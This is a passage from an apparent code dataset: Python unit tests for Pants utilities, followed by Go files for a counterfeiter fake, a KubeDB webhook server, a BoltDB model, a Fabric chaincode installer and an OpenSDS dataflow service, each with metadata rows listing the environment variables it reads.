# import time
# clock = time
with Timer(clock=clock) as t:
self.assertLess(t.start, clock.time())
self.assertGreater(t.elapsed, 0)
clock.sleep(0.1)
self.assertGreater(t.elapsed, 0.1)
clock.sleep(0.1)
self.assertTrue(t.finish is None)
self.assertGreater(t.elapsed, 0.2)
self.assertLess(t.finish, clock.time())
def test_open_zipDefault(self) -> None:
with temporary_dir() as tempdir:
with open_zip(os.path.join(tempdir, 'test'), 'w') as zf:
self.assertTrue(zf._allowZip64) # type: ignore
def test_open_zipTrue(self) -> None:
with temporary_dir() as tempdir:
with open_zip(os.path.join(tempdir, 'test'), 'w', allowZip64=True) as zf:
self.assertTrue(zf._allowZip64) # type: ignore
def test_open_zipFalse(self) -> None:
with temporary_dir() as tempdir:
with open_zip(os.path.join(tempdir, 'test'), 'w', allowZip64=False) as zf:
self.assertFalse(zf._allowZip64) # type: ignore
def test_open_zip_raises_exception_on_falsey_paths(self):
falsey = (None, '', False)
for invalid in falsey:
with self.assertRaises(InvalidZipPath), open_zip(invalid):
pass
def test_open_zip_returns_realpath_on_badzipfile(self) -> None:
# In case of file corruption, deleting a Pants-constructed symlink would not resolve the error.
with temporary_file() as not_zip:
with temporary_dir() as tempdir:
file_symlink = os.path.join(tempdir, 'foo')
os.symlink(not_zip.name, file_symlink)
self.assertEqual(os.path.realpath(file_symlink), os.path.realpath(not_zip.name))
with self.assertRaisesRegex(zipfile.BadZipfile, f'{not_zip.name}'), open_zip(file_symlink):
pass
@contextmanager
def _stdio_as_tempfiles(self) -> Iterator[None]:
"""Harness to replace `sys.std*` with tempfiles.
Validates that all files are read/written/flushed correctly, and acts as a
contextmanager to allow for recursive tests.
"""
# Prefix contents written within this instance with a unique string to differentiate
# them from other instances.
uuid_str = str(uuid.uuid4())
def u(string: str) -> str:
return f'{uuid_str}#{string}'
stdin_data = u('stdio')
stdout_data = u('stdout')
stderr_data = u('stderr')
with temporary_file(binary_mode=False) as tmp_stdin,\
temporary_file(binary_mode=False) as tmp_stdout,\
temporary_file(binary_mode=False) as tmp_stderr:
print(stdin_data, file=tmp_stdin)
tmp_stdin.seek(0)
# Read prepared content from stdin, and write content to stdout/stderr.
with stdio_as(stdout_fd=tmp_stdout.fileno(),
stderr_fd=tmp_stderr.fileno(),
stdin_fd=tmp_stdin.fileno()):
self.assertEqual(sys.stdin.fileno(), 0)
self.assertEqual(sys.stdout.fileno(), 1)
self.assertEqual(sys.stderr.fileno(), 2)
self.assertEqual(stdin_data, sys.stdin.read().strip())
print(stdout_data, file=sys.stdout)
yield
print(stderr_data, file=sys.stderr)
tmp_stdout.seek(0)
tmp_stderr.seek(0)
self.assertEqual(stdout_data, tmp_stdout.read().strip())
self.assertEqual(stderr_data, tmp_stderr.read().strip())
def test_stdio_as(self) -> None:
self.assertTrue(sys.stderr.fileno() > 2,
f"Expected a pseudofile as stderr, got: {sys.stderr}")
old_stdout, old_stderr, old_stdin = sys.stdout, sys.stderr, sys.stdin
# The first level tests that when `sys.std*` are file-likes (in particular, the ones set up in
# pytest's harness) rather than actual files, we stash and restore them properly.
with self._stdio_as_tempfiles():
# The second level stashes the first level's actual file objects and then re-opens them.
with self._stdio_as_tempfiles():
pass
# Validate that after the second level completes, the first level still sees valid
# fds on `sys.std*`.
self.assertEqual(sys.stdin.fileno(), 0)
self.assertEqual(sys.stdout.fileno(), 1)
self.assertEqual(sys.stderr.fileno(), 2)
self.assertEqual(sys.stdout, old_stdout)
self.assertEqual(sys.stderr, old_stderr)
self.assertEqual(sys.stdin, old_stdin)
def test_stdio_as_dev_null(self) -> None:
# Capture output to tempfiles.
with self._stdio_as_tempfiles():
# Read/write from/to `/dev/null`, which will be validated by the harness as not
# affecting the tempfiles.
with stdio_as(stdout_fd=-1, stderr_fd=-1, stdin_fd=-1):
self.assertEqual('', sys.stdin.read())
print('garbage', file=sys.stdout)
print('garbage', file=sys.stderr)
def test_signal_handler_as(self) -> None:
mock_initial_handler = 1
mock_new_handler = 2
with unittest.mock.patch('signal.signal', **PATCH_OPTS) as mock_signal:
mock_signal.return_value = mock_initial_handler
try:
with signal_handler_as(signal.SIGUSR2, mock_new_handler):
raise NotImplementedError('blah')
except NotImplementedError:
pass
self.assertEqual(mock_signal.call_count, 2)
mock_signal.assert_has_calls([
unittest.mock.call(signal.SIGUSR2, mock_new_handler),
unittest.mock.call(signal.SIGUSR2, mock_initial_handler)
])
def test_permissions(self) -> None:
with temporary_file(permissions=0o700) as f:
self.assertEqual(0o700, os.stat(f.name)[0] & 0o777)
with temporary_dir(permissions=0o644) as path:
self.assertEqual(0o644, os.stat(path)[0] & 0o777)
def test_exception_logging(self) -> None:
fake_logger = unittest.mock.Mock()
with self.assertRaises(AssertionError):
with exception_logging(fake_logger, 'error!'):
assert True is False
fake_logger.exception.assert_called_once_with('error!')
def test_maybe_profiled(self) -> None:
with temporary_dir() as td:
profile_path = os.path.join(td, 'profile.prof')
with maybe_profiled(profile_path):
for _ in range(5):
print('test')
# Ensure the profile data was written.
self.assertTrue(os.path.exists(profile_path))
# Ensure the profile data is valid.
pstats.Stats(profile_path).print_stats()
| [] | [] | ["USER", "AAA", "XXX", "HORK"] | [] | ["USER", "AAA", "XXX", "HORK"] | python | 4 | 0 | |
release/resource/resourcefakes/fake_archive_index.go | // Code generated by counterfeiter. DO NOT EDIT.
package resourcefakes
import (
"sync"
"github.com/nttrpf/bosh-cli/release/resource"
)
type FakeArchiveIndex struct {
FindStub func(name, fingerprint string) (string, string, error)
findMutex sync.RWMutex
findArgsForCall []struct {
name string
fingerprint string
}
findReturns struct {
result1 string
result2 string
result3 error
}
findReturnsOnCall map[int]struct {
result1 string
result2 string
result3 error
}
AddStub func(name, fingerprint, path, sha1 string) (string, string, error)
addMutex sync.RWMutex
addArgsForCall []struct {
name string
fingerprint string
path string
sha1 string
}
addReturns struct {
result1 string
result2 string
result3 error
}
addReturnsOnCall map[int]struct {
result1 string
result2 string
result3 error
}
invocations map[string][][]interface{}
invocationsMutex sync.RWMutex
}
func (fake *FakeArchiveIndex) Find(name string, fingerprint string) (string, string, error) {
fake.findMutex.Lock()
ret, specificReturn := fake.findReturnsOnCall[len(fake.findArgsForCall)]
fake.findArgsForCall = append(fake.findArgsForCall, struct {
name string
fingerprint string
}{name, fingerprint})
fake.recordInvocation("Find", []interface{}{name, fingerprint})
fake.findMutex.Unlock()
if fake.FindStub != nil {
return fake.FindStub(name, fingerprint)
}
if specificReturn {
return ret.result1, ret.result2, ret.result3
}
return fake.findReturns.result1, fake.findReturns.result2, fake.findReturns.result3
}
func (fake *FakeArchiveIndex) FindCallCount() int {
fake.findMutex.RLock()
defer fake.findMutex.RUnlock()
return len(fake.findArgsForCall)
}
func (fake *FakeArchiveIndex) FindArgsForCall(i int) (string, string) {
fake.findMutex.RLock()
defer fake.findMutex.RUnlock()
return fake.findArgsForCall[i].name, fake.findArgsForCall[i].fingerprint
}
func (fake *FakeArchiveIndex) FindReturns(result1 string, result2 string, result3 error) {
fake.FindStub = nil
fake.findReturns = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) FindReturnsOnCall(i int, result1 string, result2 string, result3 error) {
fake.FindStub = nil
if fake.findReturnsOnCall == nil {
fake.findReturnsOnCall = make(map[int]struct {
result1 string
result2 string
result3 error
})
}
fake.findReturnsOnCall[i] = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) Add(name string, fingerprint string, path string, sha1 string) (string, string, error) {
fake.addMutex.Lock()
ret, specificReturn := fake.addReturnsOnCall[len(fake.addArgsForCall)]
fake.addArgsForCall = append(fake.addArgsForCall, struct {
name string
fingerprint string
path string
sha1 string
}{name, fingerprint, path, sha1})
fake.recordInvocation("Add", []interface{}{name, fingerprint, path, sha1})
fake.addMutex.Unlock()
if fake.AddStub != nil {
return fake.AddStub(name, fingerprint, path, sha1)
}
if specificReturn {
return ret.result1, ret.result2, ret.result3
}
return fake.addReturns.result1, fake.addReturns.result2, fake.addReturns.result3
}
func (fake *FakeArchiveIndex) AddCallCount() int {
fake.addMutex.RLock()
defer fake.addMutex.RUnlock()
return len(fake.addArgsForCall)
}
func (fake *FakeArchiveIndex) AddArgsForCall(i int) (string, string, string, string) {
fake.addMutex.RLock()
defer fake.addMutex.RUnlock()
return fake.addArgsForCall[i].name, fake.addArgsForCall[i].fingerprint, fake.addArgsForCall[i].path, fake.addArgsForCall[i].sha1
}
func (fake *FakeArchiveIndex) AddReturns(result1 string, result2 string, result3 error) {
fake.AddStub = nil
fake.addReturns = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) AddReturnsOnCall(i int, result1 string, result2 string, result3 error) {
fake.AddStub = nil
if fake.addReturnsOnCall == nil {
fake.addReturnsOnCall = make(map[int]struct {
result1 string
result2 string
result3 error
})
}
fake.addReturnsOnCall[i] = struct {
result1 string
result2 string
result3 error
}{result1, result2, result3}
}
func (fake *FakeArchiveIndex) Invocations() map[string][][]interface{} {
fake.invocationsMutex.RLock()
defer fake.invocationsMutex.RUnlock()
fake.findMutex.RLock()
defer fake.findMutex.RUnlock()
fake.addMutex.RLock()
defer fake.addMutex.RUnlock()
copiedInvocations := map[string][][]interface{}{}
for key, value := range fake.invocations {
copiedInvocations[key] = value
}
return copiedInvocations
}
func (fake *FakeArchiveIndex) recordInvocation(key string, args []interface{}) {
fake.invocationsMutex.Lock()
defer fake.invocationsMutex.Unlock()
if fake.invocations == nil {
fake.invocations = map[string][][]interface{}{}
}
if fake.invocations[key] == nil {
fake.invocations[key] = [][]interface{}{}
}
fake.invocations[key] = append(fake.invocations[key], args)
}
var _ resource.ArchiveIndex = new(FakeArchiveIndex)
| [] | [] | [] | [] | [] | go | null | null | null |
pkg/server/server.go | package server
import (
"fmt"
"os"
"strings"
hooks "github.com/appscode/kubernetes-webhook-util/admission/v1beta1"
admissionreview "github.com/appscode/kubernetes-webhook-util/registry/admissionreview/v1beta1"
reg_util "github.com/appscode/kutil/admissionregistration/v1beta1"
dynamic_util "github.com/appscode/kutil/dynamic"
api "github.com/kubedb/apimachinery/apis/kubedb/v1alpha1"
"github.com/kubedb/apimachinery/pkg/admission/dormantdatabase"
"github.com/kubedb/apimachinery/pkg/admission/namespace"
"github.com/kubedb/apimachinery/pkg/admission/snapshot"
"github.com/kubedb/apimachinery/pkg/eventer"
esAdmsn "github.com/kubedb/elasticsearch/pkg/admission"
edAdmsn "github.com/kubedb/etcd/pkg/admission"
mcAdmsn "github.com/kubedb/memcached/pkg/admission"
mgAdmsn "github.com/kubedb/mongodb/pkg/admission"
myAdmsn "github.com/kubedb/mysql/pkg/admission"
"github.com/kubedb/operator/pkg/controller"
pgAdmsn "github.com/kubedb/postgres/pkg/admission"
rdAdmsn "github.com/kubedb/redis/pkg/admission"
admission "k8s.io/api/admission/v1beta1"
core "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apimachinery/pkg/runtime/serializer"
"k8s.io/apimachinery/pkg/version"
"k8s.io/apiserver/pkg/registry/rest"
genericapiserver "k8s.io/apiserver/pkg/server"
"k8s.io/client-go/kubernetes"
)
const (
apiserviceName = "v1alpha1.validators.kubedb.com"
)
var (
Scheme = runtime.NewScheme()
Codecs = serializer.NewCodecFactory(Scheme)
)
func init() {
admission.AddToScheme(Scheme)
// we need to add the options to empty v1
// TODO fix the server code to avoid this
metav1.AddToGroupVersion(Scheme, schema.GroupVersion{Version: "v1"})
// TODO: keep the generic API server from wanting this
unversioned := schema.GroupVersion{Group: "", Version: "v1"}
Scheme.AddUnversionedTypes(unversioned,
&metav1.Status{},
&metav1.APIVersions{},
&metav1.APIGroupList{},
&metav1.APIGroup{},
&metav1.APIResourceList{},
)
}
type KubeDBServerConfig struct {
GenericConfig *genericapiserver.RecommendedConfig
ExtraConfig ExtraConfig
OperatorConfig *controller.OperatorConfig
}
type ExtraConfig struct {
AdmissionHooks []hooks.AdmissionHook
}
// KubeDBServer contains state for a Kubernetes cluster master/api server.
type KubeDBServer struct {
GenericAPIServer *genericapiserver.GenericAPIServer
Operator *controller.Controller
}
func (op *KubeDBServer) Run(stopCh <-chan struct{}) error {
go op.Operator.Run(stopCh)
return op.GenericAPIServer.PrepareRun().Run(stopCh)
}
type completedConfig struct {
GenericConfig genericapiserver.CompletedConfig
ExtraConfig ExtraConfig
OperatorConfig *controller.OperatorConfig
}
type CompletedConfig struct {
// Embed a private pointer that cannot be instantiated outside of this package.
*completedConfig
}
// Complete fills in any fields not set that are required to have valid data. It's mutating the receiver.
func (c *KubeDBServerConfig) Complete() CompletedConfig {
completedCfg := completedConfig{
c.GenericConfig.Complete(),
c.ExtraConfig,
c.OperatorConfig,
}
completedCfg.GenericConfig.Version = &version.Info{
Major: "1",
Minor: "1",
}
return CompletedConfig{&completedCfg}
}
// New returns a new instance of KubeDBServer from the given config.
func (c completedConfig) New() (*KubeDBServer, error) {
genericServer, err := c.GenericConfig.New("pack-server", genericapiserver.NewEmptyDelegate()) // completion is done in Complete, no need for a second time
if err != nil {
return nil, err
}
if c.OperatorConfig.EnableMutatingWebhook {
c.ExtraConfig.AdmissionHooks = []hooks.AdmissionHook{
&mgAdmsn.MongoDBMutator{},
&myAdmsn.MySQLMutator{},
&pgAdmsn.PostgresMutator{},
&esAdmsn.ElasticsearchMutator{},
&edAdmsn.EtcdMutator{},
&rdAdmsn.RedisMutator{},
&mcAdmsn.MemcachedMutator{},
}
}
if c.OperatorConfig.EnableValidatingWebhook {
c.ExtraConfig.AdmissionHooks = append(c.ExtraConfig.AdmissionHooks,
&mgAdmsn.MongoDBValidator{},
&snapshot.SnapshotValidator{},
&dormantdatabase.DormantDatabaseValidator{},
&myAdmsn.MySQLValidator{},
&pgAdmsn.PostgresValidator{},
&esAdmsn.ElasticsearchValidator{},
&edAdmsn.EtcdValidator{},
&rdAdmsn.RedisValidator{},
&mcAdmsn.MemcachedValidator{},
&namespace.NamespaceValidator{
Resources: []string{
api.ResourcePluralElasticsearch,
api.ResourcePluralEtcd,
api.ResourcePluralMemcached,
api.ResourcePluralMongoDB,
api.ResourcePluralMySQL,
api.ResourcePluralPostgres,
api.ResourcePluralRedis,
},
})
}
ctrl, err := c.OperatorConfig.New()
if err != nil {
return nil, err
}
s := &KubeDBServer{
GenericAPIServer: genericServer,
Operator: ctrl,
}
for _, versionMap := range admissionHooksByGroupThenVersion(c.ExtraConfig.AdmissionHooks...) {
// TODO we're going to need a later k8s.io/apiserver so that we can get discovery to list a different group version for
// our endpoint which we'll use to back some custom storage which will consume the AdmissionReview type and give back the correct response
apiGroupInfo := genericapiserver.APIGroupInfo{
VersionedResourcesStorageMap: map[string]map[string]rest.Storage{},
// TODO unhardcode this. It was hardcoded before, but we need to re-evaluate
OptionsExternalVersion: &schema.GroupVersion{Version: "v1"},
Scheme: Scheme,
ParameterCodec: metav1.ParameterCodec,
NegotiatedSerializer: Codecs,
}
for _, admissionHooks := range versionMap {
for i := range admissionHooks {
admissionHook := admissionHooks[i]
admissionResource, _ := admissionHook.Resource()
admissionVersion := admissionResource.GroupVersion()
// just overwrite the groupversion with a random one. We don't really care or know.
apiGroupInfo.PrioritizedVersions = appendUniqueGroupVersion(apiGroupInfo.PrioritizedVersions, admissionVersion)
admissionReview := admissionreview.NewREST(admissionHook.Admit)
v1alpha1storage, ok := apiGroupInfo.VersionedResourcesStorageMap[admissionVersion.Version]
if !ok {
v1alpha1storage = map[string]rest.Storage{}
}
v1alpha1storage[admissionResource.Resource] = admissionReview
apiGroupInfo.VersionedResourcesStorageMap[admissionVersion.Version] = v1alpha1storage
}
}
if err := s.GenericAPIServer.InstallAPIGroup(&apiGroupInfo); err != nil {
return nil, err
}
}
for i := range c.ExtraConfig.AdmissionHooks {
admissionHook := c.ExtraConfig.AdmissionHooks[i]
postStartName := postStartHookName(admissionHook)
if len(postStartName) == 0 {
continue
}
s.GenericAPIServer.AddPostStartHookOrDie(postStartName,
func(context genericapiserver.PostStartHookContext) error {
return admissionHook.Initialize(c.OperatorConfig.ClientConfig, context.StopCh)
},
)
}
if c.OperatorConfig.EnableValidatingWebhook {
s.GenericAPIServer.AddPostStartHookOrDie("validating-webhook-xray",
func(context genericapiserver.PostStartHookContext) error {
go func() {
xray := reg_util.NewCreateValidatingWebhookXray(c.OperatorConfig.ClientConfig, apiserviceName, &api.Redis{
TypeMeta: metav1.TypeMeta{
APIVersion: api.SchemeGroupVersion.String(),
Kind: api.ResourceKindRedis,
},
ObjectMeta: metav1.ObjectMeta{
Name: "test-redis-for-webhook-xray",
Namespace: "default",
},
Spec: api.RedisSpec{
StorageType: api.StorageType("Invalid"),
},
}, context.StopCh)
if err := xray.IsActive(); err != nil {
w, _, e2 := dynamic_util.DetectWorkload(
c.OperatorConfig.ClientConfig,
core.SchemeGroupVersion.WithResource("pods"),
os.Getenv("MY_POD_NAMESPACE"),
os.Getenv("MY_POD_NAME"))
if e2 == nil {
eventer.CreateEventWithLog(
kubernetes.NewForConfigOrDie(c.OperatorConfig.ClientConfig),
"kubedb-operator",
w,
core.EventTypeWarning,
eventer.EventReasonAdmissionWebhookNotActivated,
err.Error())
}
panic(err)
}
}()
return nil
},
)
}
return s, nil
}
func appendUniqueGroupVersion(slice []schema.GroupVersion, elems ...schema.GroupVersion) []schema.GroupVersion {
m := map[schema.GroupVersion]bool{}
for _, gv := range slice {
m[gv] = true
}
for _, e := range elems {
m[e] = true
}
out := make([]schema.GroupVersion, 0, len(m))
for gv := range m {
out = append(out, gv)
}
return out
}
func postStartHookName(hook hooks.AdmissionHook) string {
var ns []string
gvr, _ := hook.Resource()
ns = append(ns, fmt.Sprintf("admit-%s.%s.%s", gvr.Resource, gvr.Version, gvr.Group))
if len(ns) == 0 {
return ""
}
return strings.Join(append(ns, "init"), "-")
}
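// admissionHooksByGroupThenVersion indexes the given hooks by API group, then by
// version. For example (illustrative), a hook whose Resource() is in group
// "validators.kubedb.com", version "v1alpha1" lands in ret["validators.kubedb.com"]["v1alpha1"].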
func admissionHooksByGroupThenVersion(admissionHooks ...hooks.AdmissionHook) map[string]map[string][]hooks.AdmissionHook {
ret := map[string]map[string][]hooks.AdmissionHook{}
for i := range admissionHooks {
hook := admissionHooks[i]
gvr, _ := hook.Resource()
group, ok := ret[gvr.Group]
if !ok {
group = map[string][]hooks.AdmissionHook{}
ret[gvr.Group] = group
}
group[gvr.Version] = append(group[gvr.Version], hook)
}
return ret
}
| ["\"MY_POD_NAMESPACE\"", "\"MY_POD_NAME\""] | [] | ["MY_POD_NAME", "MY_POD_NAMESPACE"] | [] | ["MY_POD_NAME", "MY_POD_NAMESPACE"] | go | 2 | 0 | |
pkg/model/model.go | package model
// modeled after
// https://www.opsdash.com/blog/persistent-key-value-store-golang.html
import (
"errors"
"os"
"time"
"github.com/LassoProject/lasso/pkg/cfg"
log "github.com/Sirupsen/logrus"
"github.com/boltdb/bolt"
)
var (
// ErrNotFound is returned when the key supplied to a Get or Delete
// method does not exist in the database.
ErrNotFound = errors.New("key not found")
// ErrBadValue is returned when the value supplied to the Put method
// is nil.
ErrBadValue = errors.New("bad value")
//Db holds the db
Db *bolt.DB
dbpath string
userBucket = []byte("users")
teamBucket = []byte("teams")
siteBucket = []byte("sites")
)
// may want to use encode/gob to store the user record
func init() {
dbpath = os.Getenv("LASSO_ROOT") + cfg.Cfg.DB.File
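// Note the raw concatenation: LASSO_ROOT must carry its trailing slash, e.g.
// LASSO_ROOT="/opt/lasso/" with a DB.File of "data/lasso.db" (hypothetical
// values) yields a dbpath of "/opt/lasso/data/lasso.db".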
Db, _ = OpenDB(dbpath)
}
// OpenDB the boltdb
func OpenDB(dbfile string) (*bolt.DB, error) {
opts := &bolt.Options{
Timeout: 50 * time.Millisecond,
}
db, err := bolt.Open(dbfile, 0644, opts)
if err != nil {
log.Fatal(err)
return nil, err
}
return db, nil
}
func getBucket(tx *bolt.Tx, key []byte) *bolt.Bucket {
b, err := tx.CreateBucketIfNotExists(key)
if err != nil {
log.Errorf("could not create bucket in db %s", err)
log.Errorf("check the dbfile permissions at %s", dbpath)
log.Errorf("if there's really something wrong with the data ./do.sh includes a utility to browse the dbfile")
return nil
}
return b
}
| ["\"LASSO_ROOT\""] | [] | ["LASSO_ROOT"] | [] | ["LASSO_ROOT"] | go | 1 | 0 | |
sdkconnector/installcc.go | package sdkconnector
import (
"os"
"github.com/hyperledger/fabric-sdk-go/pkg/client/resmgmt"
"github.com/hyperledger/fabric-sdk-go/pkg/common/errors/retry"
packager "github.com/hyperledger/fabric-sdk-go/pkg/fab/ccpackager/gopackager"
"github.com/hyperledger/fabric-sdk-go/pkg/fabsdk"
)
//InstallCC packages and installs chaincode on the given peer.
func InstallCC(setup *OrgSetup, chaincodePath string, chaincodeName string, chaincodeVersion string, peerURL string) error {
resourceManagerClientContext := setup.sdk.Context(fabsdk.WithUser(setup.AdminName), fabsdk.WithOrg(setup.OrgName))
resMgmtClient, err := resmgmt.New(resourceManagerClientContext)
if err != nil {
return err
}
ccPkg, err := packager.NewCCPackage(chaincodePath, os.Getenv("GOPATH"))
if err != nil {
return err
}
installCCReq := resmgmt.InstallCCRequest{Name: chaincodeName, Path: chaincodePath, Version: chaincodeVersion, Package: ccPkg}
_, err = resMgmtClient.InstallCC(installCCReq, resmgmt.WithRetry(retry.DefaultResMgmtOpts), resmgmt.WithTargetFilter(&urlTargetFilter{url: peerURL}))
if err != nil {
return err
}
return nil
}
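// Example call (hypothetical values; chaincodePath is resolved against $GOPATH/src
// by the go packager):
//   err := InstallCC(setup, "github.com/example/chaincode", "mycc", "1.0", "peer0.org1.example.com:7051")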
| ["\"GOPATH\""] | [] | ["GOPATH"] | [] | ["GOPATH"] | go | 1 | 0 | |
dataflow/pkg/service.go | package pkg
import (
"context"
"github.com/micro/go-log"
pb "github.com/opensds/go-panda/dataflow/proto"
"github.com/opensds/go-panda/dataflow/pkg/policy"
"github.com/opensds/go-panda/dataflow/pkg/plan"
"github.com/opensds/go-panda/dataflow/pkg/type"
"github.com/opensds/go-panda/dataflow/pkg/db"
. "github.com/opensds/go-panda/dataflow/pkg/utils"
"os"
"encoding/json"
"github.com/globalsign/mgo/bson"
"github.com/opensds/go-panda/dataflow/pkg/job"
"github.com/opensds/go-panda/datamover/proto"
"errors"
)
type dataflowService struct{
datamoverClient datamover.DatamoverService
}
func NewDataFlowService(datamover datamover.DatamoverService) pb.DataFlowHandler {
host := os.Getenv("DB_HOST")
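// e.g. DB_HOST="127.0.0.1:27017" (hypothetical) to reach a local mongodb endpoint.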
dbstor := Database{Credential:"unkonwn", Driver:"mongodb", Endpoint:host}
db.Init(&dbstor)
return &dataflowService{datamoverClient: datamover}
}
func (b *dataflowService) GetPolicy(ctx context.Context, in *pb.GetPolicyRequest, out *pb.GetPolicyResponse) error {
log.Log("Get policy is called in dataflow service.")
name := in.GetName()
if name == "" {
out.Err = "No name provided."
return errors.New("No name provided.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
pols, err := policy.Get(name, tenant)
if err == nil {
out.Err = ""
} else {
out.Err = err.Error()
}
log.Logf("Getpolicy err:%s.", out.Err)
//log.Logf("Getpolicy err:%d\n", rsp.ErrCode)
if err == nil {
for i := 0; i < len(pols); i++ {
p := pb.Policy{Id:string(pols[i].Id.Hex()), Name:pols[i].Name, Tenant:pols[i].Tenant,
Description:pols[i].Description}
sched := pb.Schedule{Type:pols[i].Schedule.Type, TimePoint:pols[i].Schedule.TimePoint}
for j := 0; j < len(pols[i].Schedule.Day); j++ {
sched.Days = append(sched.Days, pols[i].Schedule.Day[j])
}
p.Schedule = &sched
out.Pols = append(out.Pols, &p)
}
}
//For debug -- begin
jsons1, errs1 := json.Marshal(out)
if errs1 != nil {
log.Logf(errs1.Error())
} else {
log.Logf("jsons1: %s.\n", jsons1)
}
//For debug -- end
return err
}
func (b *dataflowService) CreatePolicy(ctx context.Context, in *pb.CreatePolicyRequest, out *pb.CreatePolicyResponse) error {
log.Log("Create policy is called in dataflow service.")
pol := _type.Policy{}
pol.Name = in.Pol.GetName()
//TODO:how to get tenant
//pol.Tenant = in.Pol.GetTenant()
pol.Tenant = "tenant"
pol.Description = in.Pol.GetDescription()
if in.Pol.GetSchedule() != nil {
pol.Schedule.Day = in.Pol.Schedule.Days
pol.Schedule.TimePoint = in.Pol.Schedule.TimePoint
pol.Schedule.Type = in.Pol.Schedule.Type
pol.Schedule.TriggerProperties = in.Pol.Schedule.TiggerProperties
} else {
out.Err = "Get schedule failed."
return errors.New("Get schedule failed.")
}
if pol.Name == "" {
out.Err = "no name provided."
return errors.New("Get schedule failed.")
}
//rsp := pb.CreatePolicyResponse{}
err := policy.Create(&pol)
if err == nil {
out.PolId = string(pol.Id.Hex())
out.Err = ""
} else {
out.Err = err.Error()
}
log.Logf("Create policy err:%s.", out.Err)
return err
}
func (b *dataflowService) DeletePolicy(ctx context.Context, in *pb.DeletePolicyRequest, out *pb.DeletePolicyResponse) error {
log.Log("Delete policy is called in dataflow service.")
//out.Id = "c506cd4b-9048-43bc-97ef-0d7dec369b42"
//out.Name = "GetPolicy." + in.Id
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
err := policy.Delete(id, tenant)
if err == nil {
out.Err = ""
} else {
out.Err = err.Error()
}
log.Logf("Delete policy err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePolicy(ctx context.Context, in *pb.UpdatePolicyRequest, out *pb.UpdatePolicyResponse) error {
log.Log("Update policy is called in dataflow service.")
pol := _type.Policy{}
if in.Pol.GetId() == "" {
out.Err = "No id provided."
return errors.New("No id provided.")
}
// bson.ObjectIdHex panics on malformed input, so validate before converting.
if !bson.IsObjectIdHex(in.Pol.Id) {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
pol.Id = bson.ObjectIdHex(in.Pol.Id)
pol.Name = in.Pol.GetName()
//TODO: how to get tenant
//pol.Tenant = in.Pol.GetTenant()
pol.Tenant = "tenant"
pol.Description = in.Pol.GetDescription()
if in.Pol.GetSchedule() != nil {
pol.Schedule.Day = in.Pol.Schedule.Days
pol.Schedule.TimePoint = in.Pol.Schedule.TimePoint
pol.Schedule.Type = in.Pol.Schedule.Type
}
//rsp := pb.CreatePolicyResponse{}
err := policy.Update(&pol)
if err == nil {
out.Err = ""
out.PolId = string(pol.Id.Hex())
	} else {
out.Err = err.Error()
}
log.Logf("Update policy finished, err:%s", out.Err)
return err
}
func fillRspConnector (out *pb.Connector, in *_type.Connector) {
switch in.StorType {
case _type.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
default:
log.Logf("Not support connector type:%v\n", in.StorType)
}
}
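// Both fillRspConnector above and fillReqConnector below grow one case per
// supported backend. A sketch of what an additional backend might look like
// (STOR_TYPE_AWS_S3 and the Region field are assumptions, not part of this
// codebase):
//
//	case _type.STOR_TYPE_AWS_S3:
//		out.BucketName = in.BucketName
//		out.Region = in.Region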
func (b *dataflowService) GetPlan(ctx context.Context, in *pb.GetPlanRequest, out *pb.GetPlanResponse) error {
log.Log("Get plan is called in dataflow service.")
name := in.GetName()
if name == ""{
out.Err = "No name specified."
return errors.New("No name specified.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
	pls, err := plan.Get(name, tenant)
if err == nil {
out.Err = ""
	} else {
out.Err = err.Error()
}
log.Logf("Get plan err:%s.", out.Err)
//log.Logf("Getpolicy err:%d\n", rsp.ErrCode)
if err == nil {
for i := 0; i < len(pls); i++ {
pl := pb.Plan{Id:string(pls[i].Id.Hex()), Name:pls[i].Name, Description:pls[i].Description,
Type:pls[i].Type, PolicyId:pls[i].PolicyId, PolicyName:pls[i].PolicyName,
OverWrite:pls[i].OverWrite, RemainSource:pls[i].RemainSource, Tenant:pls[i].Tenant}
srcConn := pb.Connector{StorType:pls[i].SourceConn.StorType}
fillRspConnector(&srcConn, &pls[i].SourceConn)
destConn := pb.Connector{StorType:pls[i].DestConn.StorType}
fillRspConnector(&destConn, &pls[i].DestConn)
filt := pb.Filter{Prefix:pls[i].Filt.Prefix}
for j := 0; j < len(pls[i].Filt.Tag); j++ {
t := pb.KV{Key:pls[i].Filt.Tag[j].Key, Value:pls[i].Filt.Tag[j].Value}
filt.Tag = append(filt.Tag, &t)
}
pl.SourceConn = &srcConn
pl.DestConn = &destConn
pl.Filt = &filt
out.Plans = append(out.Plans, &pl)
}
}
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
		log.Logf("%s", errs.Error())
	} else {
log.Logf("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func fillReqConnector (out *_type.Connector, in *pb.Connector) error {
switch in.StorType {
case _type.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
return nil
default:
log.Logf("Not support connector type:%v\n", in.StorType)
return errors.New("Invalid connector type.")
}
}
func (b *dataflowService) CreatePlan(ctx context.Context, in *pb.CreatePlanRequest, out *pb.CreatePlanResponse) error {
log.Log("Create plan is called in dataflow service.")
pl := _type.Plan{}
pl.Name = in.Plan.GetName()
//TODO:get tenant
//pl.Tenant = in.Plan.GetTenant()
pl.Tenant = "tenant"
pl.Description = in.Plan.GetDescription()
pl.Type = in.Plan.GetType()
pl.OverWrite = in.Plan.GetOverWrite()
pl.RemainSource = in.Plan.GetRemainSource()
pl.PolicyId = in.Plan.GetPolicyId()
//pl.PolicyName = in.Plan.GetPolicyName()
if in.Plan.GetSourceConn() != nil {
srcConn := _type.Connector{StorType:in.Plan.SourceConn.StorType}
